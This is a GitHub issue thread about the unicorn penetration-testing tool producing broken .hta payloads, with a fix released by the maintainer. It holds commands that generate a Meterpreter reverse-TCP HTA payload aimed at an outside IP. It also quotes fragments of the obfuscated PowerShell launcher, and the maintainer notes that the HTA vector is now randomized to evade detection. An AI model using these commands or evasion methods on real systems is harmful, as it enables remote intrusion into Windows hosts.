Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

.hta's Broken in latest unicorn? #34

Closed
decidedlygray opened this issue Mar 7, 2017 · 4 comments
Closed

.hta's Broken in latest unicorn? #34

decidedlygray opened this issue Mar 7, 2017 · 4 comments

Comments

@decidedlygray
Copy link

I'm no longer able to generate working .hta's using unicorn. I was wondering if you could confirm this is a legitimate issue, or is this just me?

I've generated working payloads on my setup before pulling the latest from GitHub. The problem appears to be that the .hta generated has some sort of syntax error, maybe from unbalanced quotes?

Steps to Recreate

  1. Clone the latest unicorn, or git pull to the latest
git clone https://github.com/trustedsec/unicorn.git

or, if you have it, update to the latest:

git pull
  1. Generate an .hta file (note: no errors show while generating, it is not a problem with generating the payload, the problem appears to be with the syntax script or powershell generated)
python unicorn.py windows/meterpreter/reverse_tcp 123.123.123.123 443 hta
  1. Launch the .hta file on a Windows host, and observe the error:
    image

Temporary Workaround

Reverting to version 2.4.2 appears to fix the issue:

git clone https://github.com/trustedsec/unicorn.git
git checkout tags/2.4.2
python unicorn.py windows/meterpreter/reverse_tcp 123.123.123.123 443 hta

Additional Details

I believe the issue is the quoting right before the larger base64 part of the payload (right before “STUFF” in this comparison for example). Reverting to 2.4.2, right before commit 8fc0a81, appears to resolve the error message and allow proper payload execution.

2.4.2:

a.run('%windir%\\System32\\cmd.exe /c powershell -w 1 -C "sv 77 -;sv II ec;sv Z ((gv 77).value.toString()+(gv II).value.toString());powershell (gv Z).value.toString() "STUFF

2.4.3

a.run('%windir%\\System32\\cmd.exe /c powershell -w 1 -C "sv CY -;sv 5S ec;sv n ((gv CY).value.toString()+(gv 5S).value.toString());powershell (gv n).value.toString() 'STUFF

So it could be related to this commit: 8fc0a81
@CarterMcKelvain
Copy link

I am having the exact same issue. Except on mine I receive four different script errors. Same window as you have shown above. All related to ')'.

@trustedsec
Copy link
Collaborator

Thanks for the report, will take a peek today and get a fix out.

@trustedsec
Copy link
Collaborator

trustedsec commented Mar 8, 2017
edited
Loading

Definitely a quoting issue with the new obfuscated technique introduced the single quotes are injected into the command. I'll figure out a workaround.

@trustedsec
Copy link
Collaborator

Thanks for the report, I've just released version 2.6 which fixes the escaping issue. I also decided to take a first stab at obfuscation of the HTA attack vector. i know things such as WScript.Shell could pop so I've randomized all of that and the variable names. Should be much harder to detect. Thanks for the report and let me know if there's anything else!

-Dave

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@CarterMcKelvain @decidedlygray